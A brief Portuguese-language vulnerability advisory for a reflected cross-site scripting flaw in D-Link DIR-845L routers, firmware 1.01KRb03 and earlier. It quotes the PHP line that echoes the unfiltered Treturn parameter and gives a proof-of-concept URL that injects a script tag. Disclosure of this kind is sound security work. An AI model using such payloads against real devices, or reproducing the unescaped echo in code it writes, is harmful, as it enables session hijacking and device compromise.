
O roteador D-Link DIR-845L é vulnerável a Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
Roteadores D-Link DIR-845L versão 1.01KRb03 e anteriores são vulneráveis a Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
/htdocs/webinc/js/bsc_sms_inbox.phpA vulnerabilidade deve-se à falta de filtragem no parâmetro $_GET["Treturn"] que é diretamente usado no código na linha 17 de bsc_sms_inbox.php.
O trecho de código vulnerável:
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
